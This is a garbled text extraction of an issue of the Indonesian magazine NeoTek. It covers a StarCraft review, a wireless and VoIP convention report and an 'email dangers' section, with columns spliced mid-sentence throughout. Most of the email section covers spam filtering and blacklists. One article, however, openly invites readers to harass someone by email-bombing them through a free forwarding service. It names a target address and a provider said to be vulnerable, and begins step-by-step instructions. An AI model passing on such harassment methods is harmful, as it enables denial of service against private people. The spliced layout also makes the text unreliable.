StartCraft
Intense Real-Time Strategy
StarCraft dari Blizzard Entertainment adalah salah satu game terbaik yang pernah ada (lihat
http://www.blizzard.com/inblizz/awards.shtml#sc). Bagi para pecinta game (gamer) tidak akan
asing dengan game yang satu ini karena game ini sudah beredar di akhir tahun 1998. Walaupun
begitu, sampai sekarang game ini tidak lekang dimakan waktu. Tetap asyik untuk dimainkan
mencoba menjadi penguasa bumi di waktu yang akan datang.
D
i masa yang akan datang (mungkin 10.000 Intense Real-Time Strategy
tahun mendatang), bumi dikuasai 3 spesies Sebagai pemimpin militer untuk spesies anda, maka
yang merupakan generasi penerus dari anda harus bekerja keras menggali sumber daya
kehidupan manusia di muka bumi. Pertentangan dan yang dibutuhkan untuk membangun sarana-sarana
persaingan hadir untuk menjadi penguasa tunggal di pasukan anda hingga membawa mereka menuju
Bumi membuat ke 3 spesies tersebut bekerja keras kemenangan. Itulah tugas utama yang akan anda
untuk mempersiapkan armada tempur. pikul nantinya ketika anda memilih game ini untuk
Begitulah sekelumit cerita yang mendasari game ini. dimainkan.
Walau dipenuhi dengan pertempuran, pertempuran Berat sekali..., tetapi itu itu hanya game. Jika dilihat
yang dilakukan berpedoman kepada misi yang secara bentuknya sebagai sebuah game, mungkin
diemban. Jika menyalahi aturan misi maka anda akan hanya menyajikan sesuatu buat melepas beban
dinyatakan kalah walalupun anda memiliki armada dunia. Tetapi game strategy ini bukanlah sembarang
tempur yang handal. game. Dari nilai pendidikan, game ini mengajak
anda menjadi pemimpin, apakah anda pemimpin
yang baik? Jawabnya adalah mencoba dahulu game
ini. Jadi game ini bukan sekedar pelepas lelah,
malah bahkan dapat menjadi penambah kelelahan
anda karena tuntutan berpikir yang dalam menjadi
kunci kemenangan.
Windows 95/98/NT
Pentium 90 or higher
16 MB RAM
DirectX-Compatible SVGA Video Card
Microsoft-Compatible Mouse
Double-Speed CD-ROM
Macintosh
PowerMac or Compatible
16 MB RAM
System 7.6 or higher
256 Color, 640x480 Display or Better
Double-Speed CD-ROM
Jenis-jenis Spesies
Seperti yang telah disebutkan di atas, ada spesies
yang menjadi penerus kehidupan manusia di akan
datang yaitu:
? Terran. Penampilan phisik seperti manusia
adanya, tidak ada perubahan yang berarti pada
spesies ini.
? Protoss. Penampilan phisiknya juga seperti
manusia tetapi juga memiliki unsur hewan,
memiliki kemampuan tidak kalah dengan Terran.
? Zerg. Penampilan phisiknya sudah tidak lagi
menyerupai manusia, kepintaran otak yang
dimiliki sama dengan manusia karena pada
dasarnya merupakan keturunan dari manusia,
bahkan armada tempurnya tidak kalah hebatnya
dengan Terran dan Protoss.
HomePage
Harga NeoTek + CD:
Salam!
Rp20.000,- (P. Jawa)
Rp22.000,- (Luar P. Jawa)
NEOTEK
Dunia Teknologi Baru
Bahaya Email:
Footprinting Dari Spam sampai Virus
Scanning
Enumeration
Gaining Access
Escalating ? Email bagi setiap pengguna internet menjadi penting fungsinya sebagai alat
Privilege berkomunikasi, dibalik itu ada bahaya yang sedang mengintai.
E
mail bukan lagi barang baru karena hampir pengguna
Pilfering internet secara personal, sebuah badan usaha maupun
badan non-usaha menggunakan email sebagai salah
satu cara berkomunikasi kepada teman, saudara, rekan bisnis dan
lain sebagainya. Makin berkembangnya internet, email makin
Covering Tracks marak dengan hadirnya berbagai macam jasa layanan email baik
gratis maupun non-gratis.
Karena perkembangan internet yang pesat tersebut dan
Creating pengguna email sendiri makin bertambah jumlahnya, kini email
Backdoors mulai terancam bahaya yang dilakukan melalui internet dengan
email sebagai korban ataupun email sebagai alatnya.
Kenali email anda dan bahaya-bahaya yang dapat mengancam
Denial of eksistensi email anda.
Service
21 Bahaya Email:
Anti-Spam Windows
Menanggulangi Spam dengan Anti-
Spam Toolkits untuk pengguna Windows.
BAHAYA EMAIL
26 Bahaya Email:
Anti-Spam Linux
Bahaya Email:
NeoStart Dari Spam sampai Virus
NeoStyle
12
Mengenal bahaya-bahaya
yang mengancam melalui
7 Friendster:
Sahabat Pena OnLine
email dari Spam sampai
Virus, penting untuk diketahui. 45 Menggabungkan
Beberapa Image (1)
Sahabat pena merambah ke dunia
Dengan Marque Tool, menggabungkan
maya, Friendster salah satu web Bahaya Email: lebih dari satu image untuk menjadi
aplikasi tersebut yang lagi booming!!!.
Ngebom Email Lewat Email image yang memiliki karya seni.
8
Ini bukan teroris walau
Pertemuan Para
Geeks di Denmark 15 terlihat ekstrim, ngebom
email dengan perantara 46 Menggabungkan
Beberapa Image (2)
Para hacker dunia berkumpul di
email. Ternyata benar dapat Dengan Lasso Tool, menggabungkan
Denmark dalam acara workshop wireless.
dilakukan, anda bisa buktikan. lebih dari satu image untuk menjadi
image yang memiliki karya seni.
40 Database Security:
VP-ASP Shopping
Cart
NeoSoft
StarCraft
Salah satu aplikasi shopping cart
yang mengijinkan orang lain yang 0 Intense Real-Time Strategy
tidak memiliki otoritas mengambil fle Military Leader game
.mdb dengan cara men-download-nya dengan skenario Bumi
untuk keuntungan pribadi. dimasa mendatang
41
Web Security:
Memahami XSS NeoProfil
NeoTutor Memahami konsep
penyalahgunaan XSS (Cross Site
Scripting) berhubungan dengan
3
Editorial Office
4 Cairnhill Rise
#05-01 The Cairnhill
29 Computer Forensics: aplikasi keamanan web.
Singapore 229740
Tools pada Linux Telp. +65-67386482
Forensik komputer juga dapat
dilakukan di Linux dengan tool yang 44 Bimetrisc:
Security berdasarkan Business Office
terdapat didalamnya. Karakteristik Biologis Gedung Cahaya Palmerah 503
Ketika Password dan PIN tidak lagi Jl. Palmerah Utara III No. 9
34
Jakarta 11480
Computer Forensics: menjanjikan keamanan. Biometrics
Telp. 021-5481457
Analisa Forensik muncul sebagai pilihan baru dengan
Fax. 021-5329041
Analisa forensik dengan berdasarkan karakteristik biologis
memanfaatkan Galleta dan Pasco dan seperti sidik jari, retina, iris, suara, dan
lain sebagainya yang digunakan untuk Pemimpin Umum
juga dengan menggunakan IE History
teknologi verifikasi personal. Fachri Said
Viewer.
Pemimpin Redaksi
NeoTekno
Kosasih Iskandarsjah
Redaktur Ahli
Onno W. Purbo
Michael S. Sunggiardi
38 Database Security:
Mencegah MDB Pemimpin Usaha
Fahmi Oemar
Download Dadang Krisdayadi
Beberapa shopping Cart yang
menggunakan file .mdb sebagai Redaktur Pelaksana
databasenya terkadang mengijinkan MA Rody Candera
pihak luar untuk men-download-nya. Sekretaris Redaksi
Marni
NeoRagam NeoTek Vol. IV No. 10 Webmaster
Supriyanto
4 Klak Klik
StarCraft
Military Leader Game
Computer Forensics
Kenali bagaimana para cyber cop
Sirkulasi
Hedhi Sabaruddin
Beijing International menangani kasus-kasus kriminalitas
Book Fair 2004 yang melibatkan penggunaan kom- Adm. Langganan
puter serta apa saja tool yang digu- KRISHNAdiSTRIBUTOR
nakannya yang dapat diterima seba-
5 Talkshow NeoTeker Iklan dan Promosi
di Toko-toko Buku gai evidence di pengadilan. Gianto Widianto
Gramedia Se-Jabotabek
Straits Times ComputerMart Cracking Software Keuangan
SunTec City Singapore 8-9 ASProtect adalah software proteksi Aswan Bakri
Oktober 2004 yang paling banyak digunakan selain
Armadillo. Dengan pendekatan Bank
software cracking diharapkan dapat
6 Daftar Isi CD NeoTek Bank BNI
Anti-Spam Windows, Anti- memberikan pemahaman trik proteksi a.n. PT NeoTek Maju Mandiri
Spam Linux, Anti-Spam serta programming yang mendalam. No. rekening 070.001709720.001
MacOS, Enkripsi, Fake Mailer,
Bank BCA Matraman
Forensic Tools, Mail Bomber,
(khusus untuk langganan)
Mail Remover, Mail Server,
a.n. Boedi Krishnadi
Game, Voip Merdeka.
No. rekening 342-239-1611
Win 95/98/NT
DirectX 2.0
Pentium 90 MHz or higher
16 MB RAM
Direct-X compatible SVGA videocard
Microsoft compaible mouse
4x CD ROM drive
FRIENDSTER D
UNIA ONLINE SUDAH MEWABAH DI
mana-mana sehingga sahabat pena
online juga sudah ada, Friendster
salah satunya. Sistim yang dipakai yaitu
NmN
Neoteker menjawab Neoteker
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.
Tapi semua rata-rata membawa laptop- Terus terang, harus di akui memang rak-
nya masing-masing, tersambung ke yat menggunakan frekuensi tanpa ijin.
jaringan wireless dengan Access Point Bukan karena rakyat tidak tahu aturan,
yang bertebaran di mana-mana pada tapi rakyat invest peralatan wireless
frekuensi 2.4GHz - tentunya tanpa internet ini karena industri telekomu-
perlu ijin frekuensi dari POSTEL. nikasi tidak sanggup memberikan servis
Untuk mengirit biaya, sebagian peserta broadband murah kepada rakyat.
terutama yang datang dari Berlin Jer- Proses mendanai diri sendiri tidak ter-
man Barat yang merupakan salah satu gantung pada bank dunia, ADB, IMF
kontingen yang paling besar, membuat maupun bantuan donor dengan kon-
tenda di lapangan untuk tidur mereka. disi pemerintah yang tidak memihak
Berbagai foto yang menggambarkan pada rakyat banyak membuat kaget
suasana konvensi dapat diambil di dan kagum rekan-rekan dari 30 negara
http://thewirelessroadshow.org. yang hadir pada konvensi tersebut.
Saya sangat menyarankan bagi anda Akibatnya, salah satu usulan dalam
untuk melihat-lihat foto-foto selama konvensi Freifunk ini adalah meng-
konvensi, untuk melihat bagaimana adakan wireless workshop di Indonesia
ceria-nya para geek dan wireless tahun 2005 atau 2006 mendatang.
network hacker yang bekerja sama Mereka, banyak negara di dunia, sa-
membangun jaringan, dan bertukar ngat tertarik sekali untuk belajar dari
ilmu dan pengalaman. perjuangan bangsa Indonesia. Mereka Men-setup Mesh Network.
ingin mengetahui resep yang diguna-
Wireless for Development kan bangsa Indonesia untuk meraih sekali. Bentuk jaringan bukan star yang
Saya berkesempatan berkontribusi di kemerdekaannya di dunia Internet. terpusat seperti pada Access Point, tapi
beberapa sesi, seperti sesi bagi pemula Mereka ingin teman-teman yang lain mesh karena antar node saling tolong
(beginner). Di sesi ini saya bersama di dunia juga merasakan merdeka. menolong untuk merelay paket ke
Carlo dari Italia memberikan gambar- Ada beberapa hal yang menarik untuk tujuan. Protocol yang memungkinkan
an kepada para pemula tentang bagai- jaringan wireless mesh ini beroperasi
di simak dari konvensi wireless net-
mana kerja dari wireless network. work di Djursland, Denmark ini. adalah OLSR, dapat diambil dari
http://www.olsr.org.
Yang agak mengagetkan bagi saya pri- Beberapa diantara akan di jelaskan
badi, Sebastian meminta saya untuk berikut ini. Dari indowli@yahoogroups.com, di-
memberikan ceramah di muka semua ketahui bahwa ternyata di Cempaka
peserta bersama Dave yang menama- Mesh Network Putih, tepatnya di Universitas Yarsi,
kan dirinya Cursor Cowboy dari Ame- Mesh network yang dimotori oleh Jakarta dengan dimotori Pak Yadi, saat
rika Serikat. Berbeda dengan Dave yang rekan-rekan Berlin Wireless FreiFunk ini telah beroperasi jaringan mesh
memang banyak pengalaman praktis- barangkali merupakan salah satu pri- wireless menggunakan mesh.
nya, tapi tidak banyak melakukan madona dalam konvensi ini. Dengan
community development dan empo- menggunakan mesh network, kita da- Ronja pada Frekuensi TeraHertz
werment. pat membangun jaringan wireless tan- Yang menarik dan banyak dibicarakan
pa memerlukan Access Point yang besar, orang selama konvensi adalah inisiatif
Apa yang saya jelaskan pada kesem-
tower yang tinggi. yang dimotori rekan-rekan di Chez
patan tersebut berjudul "It's NOT untuk membangun dan membuat sen-
Illegal, It's just NOT legal (Richard Jaringan wireless dapat dibangun meng-
diri jaringan komputer di kota mereka
Fuchs, IDRC)." gunakan peralatan wireless yang kecil menggunakan laser (cahaya) antar-ge-
Saya menjelaskan bagaimana perjuang- saja, tapi saling tolong menolong,
dung. Teknologi ini dinamakan Ronja
an bangsa Indonesia untuk dapat mem- saling relay antara alat untuk memba- dan semua tekniknya tersedia gratis di
bangun infrastruktur Internet-nya ngun jaringan yang besar.
http://ronja.twibright.com. Kecepatan
dibawah represi pemerintah dan aparat Peralatan wireless pada mesh network data sekitar 10Mbps, untuk jarak 1-2 km.
yang tidak berpihak pada rakyat, bahkan bekerja pada mode Ad-Hoc, artinya
di-sweeping dan diambil peralatannya. tidak menggunakan Access Point sama Yang menarik di teknologi komunikasi
menggunakan laser/optik karena fre-
Onno W. Purbo dalam sesi Wireless for Development. Experimental transmitter Ronja.
Beberapa model mekanis Ronja yang sudah terpasang di berbagai lokasi di Chez.
kuensi 2.4GHz sehingga performance (dari Italia) dan Rai?da (dari Jordania) Initiation Protocol). Karena SIP yang
antenna menjadi tidak baik. secara iseng, membuat antena dari digunakan sebagai basis, maka operasi
Selesai membuat antenna < panjang kotak minuman dan di ukur gain-nya VoIP lebih enteng daripada VoIP yang
gelombang, kita harus memasukan ternyata tidak berbeda jauh dengan menggunakan H.323 seperti VoIP
konektor tipe N ke kaleng dan mem- antenna kaleng. Merdeka.
bor mebuat lubang untuk mur/baut Di Indonesia pengoperasian jaringan
yang akan mengencangkan antenna < Teknologi VoIP SIP dilakukan oleh Anton Raharja
panjang gelombang pada tempatnya. Selain Wireless Internet, para geek dan (anton@ngoprek.org) dan dapat
Selesai sudah proses pembuatan hacker juga melakukan eksplorasi dan diregistrasi dari
antenna kaleng. Selanjutnya di ukur tukar pengalaman tentang telepon http://www.voiprakyat.net.
menggunakan SWR Meter dengan Internet. Software Asterisk dapat diambil dari
injeksi sinyal dari sumber sinyal video Saya pada akhirnya memimpin http://www.asterisk.org, sedang ber-
yang bekerja pada frekuensi 2.4GHz. workshop VoIP bagi para pemula di bagai dokumentasi dapat diambil dari
SWR meter tersebut buatan sendiri konvensi freifunk. Pada dasarnya http://www.asteriskdocs.org.
yang disain-nya dapat dicari di teknologi VoIP Merdeka yang berbasis Jika kita mengenal NetMeeting sebagai
www.google.com. protokol H.323 saya terangkan, semua softphone di Windows untuk H.323 yang
Proses pengukuran selanjutnya adalah materi seperti biasa dapat diambil dari digunakan oleh VoIP Merdeka, maka
mengukur kekuatan/gain antenna, hal http://www.apjii.or.id/onno/. untuk SIP kita mengenal beberapa soft-
ini dilakukan dengan cara memban- Pada kesempatan workshop VoIP un- phone yang gratis, seperti xlite (Windows),
dingkan kekuatan sinyal yang diterima tuk pemula, saya memang sengaja Sjphone & Kphone (Linux).
oleh antenna yang kita buat dengan membawa peralatan Internet Telephony Pada dasarnya ada tiga file konfigurasi
antenna referensi yang gain-nya dike- Gateway (ITG) yang biasa saya pakai yang harus di set untuk minimal meng-
tahui. Beberapa rekan seperti Carlo di rumah untuk menghubungkan VoIP operasikan sebuah server asterisk.
Merdeka ke PABX yang saya operasi-
kan di rumah, dan tentu saja dapat File /etc/asterisk/sip.conf untuk meng-
terhubung ke Telkom maupun HP me- atur terminal SIP yang tersambung ke
lalui Telkom. kita, /etc/asterisk/extension.conf untuk
mengatur numbering plan, routing
Para peserta cukup banyak yang nomor dll, dan /etc/asterisk/iax.conf
terkagum-kagum, karena selama ini untuk mengatur hubungan antar
mereka umumnya hanya sebagai Asterisk server.
pengguna VoIP, bukan penyelenggara
VoIP yang mengoperasikan gateway Demikian sepintas gambaran suasana
antara VoIP dengan telepon PSTN pertemuan para geek & hacker wire-
(milik Telkom). less Internet yang datang dari lebih 30
negara di dunia.
Asterisk: Sentral Telepon VoIP Merupakan pengalaman menarik karena
Dipimpin oleh Klaus Peter dari Berlin, saya adalah satu-satunya yang datang
para hacker yang lebih senior termasuk dari kawasan Asia Tenggara, dan cukup
saya menjadi peserta di dalamnya, ka- beruntung dapat berkontribusi dalam
mi mulai belajar mengoperasikan beberapa sesi dan memimpin workshop.
Asterisk. Onno W. Purbo
Asterisk pada dasarnya sentral telepon onno@indo.net.id
VoIP yang berbasis utama SIP (Session Rakyat Indonesia Biasa
Asterisk Mini-PABX
BAHAYA EMAIL
Dari Spam sampai Virus
Email sudah menjadi perkara sehari-hari. Namun ternyata teknologi yang memudahkan hidup kita itu
dapat juga justru menjadi penyebab bencana. M.A. Rody Candera (odyxb@bogor.net)
mengingatkan anda agar jangan meremehkan potensi bahaya yang berasal dari email.
E
MAIL (ELEKTRONIK MAIL) MERUPAKAN TEROBOSAN DALAM
bidang teknologi internet yang mampu menggan-
tikan sistem korespondensi yang reguler. Benarkah
sistem korespondensi reguler akan tergeser posisinya oleh
sistem korespondensi elektronik (email)?
Sistem korespondensi reguler dan sistem korespondensi
elektronik memiliki kelebihan dan kekurangannya masing-
masing. Keberadaan email bukan untuk menggantikan sis-
tem korespondensi reguler, melainkan sebagai hasil dari
teknologi internet yang menempatkan email sebagai pilih-
an baru untuk berkomunikasi antar-pengguna internet
dalam suasana koresponden yang menyerupai sistem
korespondensi reguler.
Keberadaan email sendiri sudah sampai dirasakan perlu
untuk dimiliki baik secara personal maupun non-personal
dengan tujuan pemanfaatannya masing-masing.
Kini sudah banyak hadir website penyedia jasa email baik
yang gratis maupun yang tidak gratis untuk dapat memi-
liki sebuah email. Sebagai contoh yaitu Yahoo! website
penyedia jasa email yang memiliki anggota terbanyak Gambar 1. Contoh anonymail
dibandingkan penyedia jasa lainnya, menawarkan account
email mulai dari yang gratis sampai pada account email
yang memiliki tarif harga.
Bahaya Email
Perkembangan teknologi yang dirasakan makin marak ini
ternyata dibarengi oleh kehidupan dunia underground
yang menjadikan internet dirundung bahaya.
Email yang merupakan bagian dari hasil teknologi internet
juga terancam bahaya. Bahaya tersebut bisa datang dari
luar dan bisa juga diakibatkan kesalahan yang dilakukan
oleh penggunanya. Gambar 2. Anonymail yang ternyata berisi virus.
Menurut penulis, bahaya email jika dibagi-bagi berdasar- Saat ini, anonymail sering digunakan oleh seseorang yang
kan bentuknya dapat dibagi dalam lima macam yaitu: akan mengganggu privasi kita disertai sebuah paket yang
1. Anonymail berisi virus (virusmail).
2. Sinonymail
3. Virusmail MyDoom, salah satu jenis virus yang sangat berbahaya
4. MailBomber yang sempat menggegerkan dunia teknologi internet
5. Nigermail beberapa waktu lalu, hingga kini masih terus digunakan
oleh orang-orang isen untuk menganggu email anda.
Anonymail http://www.smg.vision.net.id/announcement.php?id=11
Berasal dari kata anonymous dan mail, jika diartikan yaitu
surat tidak dikenal (atau dapat juga dikatakan email kaleng
setara dengan surat kaleng). Tidak dikenal maksudnya
adalah pengirim surat tersebut. Seseorang yang meng-
ancam privasi email kita, biasanya menggunakan email
yang tidak mengindikasikan pemilik email. Maka pilihan
penggangu privasi kita tersebut menggunakan email yang
tidak dikenal oleh kita
Kepemilikan account email gratis oleh banyak disediakan
penyedia jasa email memungkinkan seseorang untuk men-
daftarkan sebuah account email dengan identitas palsu.
Gambar 3. Peringatan dari ISP tentang bahaya MyDoom.
BAHAYA EMAIL
Ngebom Email Lewat Email
Menjadi terrorist berat hukumannya. Tapi terrorist di dunia cyber memberikan
wawasan yang lain. Dengan sekedar menggunakan layanan email
anda bisa juga menjadi terrorist. Bagaimana mungkin?
S
EMENJAK INTERNET MERAMBAH LAPISAN MASYARAKAT
di Indonesia tidak sedikit masyarakat kita yang mu-
lai menggunakan fasilitas internet sebagai cara
terbaik untuk meningkatkan atau melebarkan sayap usaha-
nya. Dan tidak sedikit pula dari mereka yang menggunakan
jasa mailing list untuk mempromosikan dan menjual barang
yang mereka tawarkan. Email adalah kunci semua itu. Dengan
email anda dapat berkomunikasi dengan orang manapun
dan berada di belahan dunia manapun juga. Semakin marak-
nya orang mem-publish email mereka , banyak juga saing-
an atau orang yang iri dengan cara melakukan tindakan
pengrusakan email.
Istilah Bombing muncul ketika seseorang mendapati mail box-
nya berisi email yang banyak (melebihi kapasitas), yang mem-
punyai alamat pengirim yang sama, isi yang sama, subject
yang sama dan datang dalam waktu berurutan. Sebenarnya
hal ini ialah mungkin saja bisa terjadi ketika sebuah mail
server tidak menyediakan servis yang memuaskan ketika
terjadi serangan, thread atau Denial of Service sekalipun.
Kejahatan email seperti diatas secara umum di sebut SPAM.
Begitu banyak arti dari spam tapi nge-bom email juga dapat Gambar 1. Alur Forward.
di kategorikan spam. Dan tentunya sudah menjadi keharus-
an mail server tersebut untuk memberikan layanan anti dan tentunya gratis. Setelah pencarian yang lama akhirnya
spam atau setidaknya bekerja sama dengan lembaga atau saya ketemukan situs yang memberikan fasilitas forward
software house untuk menanganinya. secara gratis. Cara forwardnya pun aneh lain dari mail ser-
ver yang lain yang mempunyai fasilitas sejenis.
Tapi syukurnya, sekarang aksi bombing sudah jarang dan
tidak bisa dilakukan karena beberapa mail server sudah di Cara Kerja Email Forwarding
lengkapi dengan aplikasi anti spam. Namun tidak menutup Asumsikan bahwa account di mail server A dapat mem-
kemungkinan mail server lain, yang telah penulis uji yaitu forward ke account di mail server B dan mail server C.
telkom.net yang masih jebol jika di bom.
1. Email yang masuk di account mail server A telah di-
Cara Ngebom Email Lewat Email setting forward-nya. Email yang masuk tersebut akan di-
Kenapa harus email yang menjadi sasaran, kenapa tidak si- forward ke account di mail server B dan mail server C.
tus atau keamanan server? Sebenarnya mudah saja, email 2. Tentunya dalam hal setting forward di mail server A ha-
merupakan tempat untuk menghubungi seseorang di dunia rusnya ada handshaking antara mail server A dengan
cyber. Layaknya No. HP atau telepon, dapatkah anda ba- mail server B atau mail server C dengan memasukkan
yangkan jika anda tidak mempunyai nomor telepon yang account email dan passwordnya. Jika autentikasi telah
bisa dihubungi ketika ingin melamar pekerjaan? Tentunya berjalan sempurna maka proses forward akan berjalan
hal ini akan mempersulit anda. Begitu juga dengan email semestinya
yang notebene merupakan identitas seseorang di dunia
cyber untuk dapat bisa saling berkomunikasi. Secara mendasar dan umum proses forward email seperti di
jelaskan diatas. Dari keterangan diatas dapat digarisbawahi
Nah dari sinilah bisa di tarik kesimpulan bahwa email ialah bahwa untuk melakukan forward yang harus kita setting
identitas layaknya KTP atau alamat rumah anda di Internet. ialah account email dan password.
Maka jika anda ingin berbuat 'nakal' sebaiknya ganggu se-
seorang melalui emailnya. Cara yang saya tawarkan ialah Bagaimana jika ada mail server yang mempunyai fasilitas
bomb email. Cara ini sebenarnya cara kuno tapi jangan forwarding gratis, setting forward tanpa harus memasukkan
sangka trik 'hitam' dari saya ini akan membuat siapapun password, dan semua email yang masuk langsung di-forward
yang menjadi target akan beram dan saya yakin itu. Trik ini ke email target tanpa harus di save di inbox?
saya namai ngebom email lewat email. Anda penasaran?
Cara ini saya ketemukan ketika saya mempunyai banyak Mail server tersebut ialah http://www.emailaccount.com.
email. Sedangkan semua email tersebut aktif. Karena masa- Sebelum saya jabarkan tehnik ngebom ini sebaiknya per-
lah ini dan bingung mengelolanya maka saya membutuh- siapkan satu email target yang akan dijadikan korban.
kan satu account email yang mempunyai fasilitas forward Dalam contoh ini ialah mwiryanu@telkom.net
Langkah-langkah Ngebom
1. Buka situs http://www.emailaccount.com dan daftar
email di sana.
Email Sebagai Senjata Adapun untuk menjaga kerahasiaan isi email, anda disa-
rankan menerapkan enkripsi terhadap email anda. Untuk
Dari Email Kaleng sampai Spam ini yang paling lazim digunakan dan sudah teruji ketang-
guhannya adalah PGP (Pretty Good Privacy).
U
NTUK MELENGKAPI BAHASAN MENGENAI BAHAYAEMAIL
dalam NeoTek edisi ini, disarankan anda membuka PGP pernah dibahas secara terinci dalam NeoTek II/11
kembali NeoTek III/02, khususnya halaman 14-16 halaman 40-45, yaitu:
dengan judul di atas. PGP Freeware 7.0.3: Instalasi dan Mengirim Gembok
Disini dibahas cara mengirim email tanpa alamat (email
PGP Freeware 7.0.3: Import Keyring dan Email
kaleng) menggunakan fasilitas remailer dari software Terenkripsi
seperti Private Idaho.
PGP Freeware: Enkripsi/Dekripsi untuk Web Mail
Anda dapat pula mengirim email dengan alamat palsu,
yang dalam edisi ini disarankan dengan memanipulasi Pop mail client seperti Outlook ataupun Outlook Express
header email menggunakan fasilitas standar telnet dalam sangat rentan terhadap attachment virus dan trojan, se-
mengirim email (tulisan Onno W. Purbo di NeoTek II/4). hingga sedapat mungkin gunakan dulu email remover
Apabila menggunakan telnet masih terlalu teknis untuk untuk menseleksi email yang akan di-download.
anda, gunakan saja local SMTP server seperti PostCast Gunakan dulu web mail service sebelum men-download
Server yang dibahas di NeoTek IV/02 halaman 44. email menggunakan pop mail client.
Email bombing yang dibahas terinci pada NeoTek kali ini Dapat juga anda menggunakan pop mail client yang
pernah juga dibahas sepintas pada NeoTek Vol. III No. relatif lebih aman seperti misalnya The Bat.
02, yang disini anda disarankan menggunakan softare
email remover untuk menghadapinya.
BAHAYA EMAIL
Menanggulangi Spam
Spam adalah email yang tidak dikehendaki. Namanya diambil dari makanan kaleng jaman Perang Dunia II,
yang tidak diingini dibandingkan daging segar atau ham yang disetarakan dengan email yang memang
dikehendaki. MA Rody Candera (odyxb@bogor.net) membahas konsep menanggulangi spam.
Menanggulangi Spam
A
NDA PENGGUNA EMAIL? BERHATI-HATILAH. EMAIL BUKAN
barang baru lagi di dunia internet, hampir semua Metode Dasar
pengguna internet memiliki account email baik
berupa account gratis sampai yang account non-gratis. Umumnya cara yang dilakukan dalam mengantisipasi spam
Beberapa tahun terakhir, spam message makin hebat adalah dengan melakukan filterisasi yaitu Filtering by
melakukan aksinya. Berdasarkan hasil riset mengatakan Keyword dan Filtering by Email Address.
"dari 300 message yang diterima oleh email, hanya 30 1. Filtering by Keyword
yang merupakan message yang bukan spam message".
Cara ini berpedoman kepada words detection (deteksi kata-
Apakah begitu merajalelanya spam messages? Untuk kata). Deteksi tersebut didasarkan kepada input keyword
mengetahuinya, anda dapat mengetahuinya dengan (kata kunci) pada list keyword filtering dengan pilihan
membaca RFC2635 yang menjelaskan Mengapa Spam itu words yang mengandung kesan promotion, advertisement,
Berbahaya (http://www.faqs.org/rfcs/rfc2635.html). dan refinance.
RFC2635 tidak hanya menjelaskan bahaya spam message
tetapi juga petunjuk-petunjuk dalam mengatasi spam 2. Filtering by Email Address
message baik untuk admin system sampai user biasa. Cara ini dapat diberlakukan untuk mengantisipasi spam
Spam pertama kalinya ditemukan pada bulan Mei 1978, berdasarkan input alamat email pada list email address
ditandai dengan message yang berisi iklan yang dikirimkan filtering. Dengan cara ini, maka email yang masuk kedalam
ke setiap pemilik account email di West Coast yang memi- daftar filtering dapat diposisikan pada direktori khusus
liki pelanggan lebih dari 600 orang. Berikut dibawah ini seperti Bulk Directory atau bahkan ditolak.
adalah kutipan spam message tersebut:
DIGITAL WILL BE GIVING A PRODUCT PRESENTATION OF THE NEWEST
MEMBERS OF THE DECSYSTEM-20 FAMILY; THE DECSYSTEM-2020, 2020T,
2060, AND 2060T. THE DECSYSTEM-20 FAMILY OF COMPUTERS HAS
ENVOLVED OPERATING SYSTEM AND THE DECSYSTEM-10 <PDP-10>
COMPUTER ARCHITECTURE. BOTH THE DECSYSTEM-2060T AND 2020T
OFFER FULL ARPANET SUPPORT UNDER THE TOPS-20 OPERATING SYSTEM.
THE DECSYSTEM-2060 IS AN UPWARD EXTENSION OF THE CURRENT
DECSYSTEM 2040 AND 2050 FAMILY. THE DECSYSTEM-2020 IS A NEW LOW
END MEMBER OF THE DECSYSTEM-20 FAMILY AND FULLY SOFTWARE
COMPATIBLE WITH ALL OF THE OTHER DECSYSTEM-20 MODELS.
WE INVITE YOU TO COME SEE THE 2020 AND HEAR ABOUT THE
DECSYSTEM-20 FAMILY AT THE TWO PRODUCT PRESENTATIONS WE WILL
BE GIVING IN CALIFORNIA THIS MOTH. THE LOCATIONS WILL BE:
TUESDAY, MAY 9, 1978 -2 PM
HYATT HOUSE (NEAR THE L.A. AIRPORT)
LOS ANGELES, CA
THURSDAY, MAY 11, 1978 - PM
DUNFEY'S ROYAL COACH
SAN MATEO, CA
(4 MILES SOUTH OF S.F. AIRPORT AT BAYSHORE, RT 101 AND RT 92)
A 2020 WILL BE THERE FOR YOU TO VIEW. ALSO TERMINALS ON-LINE TO
OTHER DECSYSTEM-20 SYSTEMS THROUGH THE ARPANET. IF YOU ARE
UNABLE TO ATTEND, PLEASE FEEL FREE TO CONTACT THE NEAREST DEC Gambar 2. Memfilter email.
OFFICE FOR MORE INFORMATION ABOUT THE EXCITING DECSYSTEM-20
FAMILY. DNS Blacklist
Gambar 1. Kutipan spam message yang pertama DNSBL (DNS Blacklist) adalah salah satu dari beberapa
teknik dalam menangani spam. DNSBL merupakan bagian
Istilah SPAM awalnya berasal dari USENET, yaitu sebuah yang ter-integrasi dalam spam-fighting toolkit untuk me-
World Wide Bulletin Board System tempat orang-orang lakukan tugas dalam mem-blocking spammer. DNSBL
saling posting messages dalam sebuah forum umum. terdiri dari dua tipe berdasarkan penggunaannya yaitu:
USENET memberikan istilah SPAM untuk UNWANTED 1. IP-based DNS Backlist
POSTING.
Blakclist yang dilakukan berdasarkan alamat IP (Internet
Istilah spam message pada email juga dikenal dengan isti- Protocol) dari server mail pengirim. Setiap host termasuk
lah "junk" email. Email yang merupakan bagian dari hasil didalamnya e-mail server, terkoneksi ke internet memiliki
teknologi internet juga terancam bahaya. Bahaya tersebut alamat IP yang unik. Alamat IP ini ditandai dalam sebuah
bisa datang dari luar dan bisa juga diakibatkan kesalahan database jika teridentifikasi sebagai sebagai spammer.
yang dilakukan oleh penggunanya.
BAHAYA EMAIL
Anti-Spam Toolkits for Windows
Dengan menggunakan konsep penanggulangan spam, terdapat berbagai software untuk menanggulangi
spam, baik yang berjalan pada sisi client maupun pada sisi server. Mangihut Simanjuntak
(bluefeel_s@yahoo.com) membahas berbagai tool pada sistem operasi Windows.
Gambar 2.
Konfigurasi Gambar 3. SpamPal untuk Windows
SpamBayes
BAHAYA EMAIL
Anti-Spam Toolkits for Linux
Menggunakan konsep penanggulangan spam seperti dibahas sebelumnya, terdapat berbagai software
untuk menanggulangi spam, baik yang berjalan pada sisi client ataupun pada sisi server.
MA Rody Candera (odyxb@bogor.net) mengulas berbagai toolkit anti spam pada sistem operasi Linux.
S
ELAIN DI WINDOWS, ADA JUGA TOOLKITS ANTI SPAM 1. razor-agent.conf; file konfigurasi untuk varia razor-
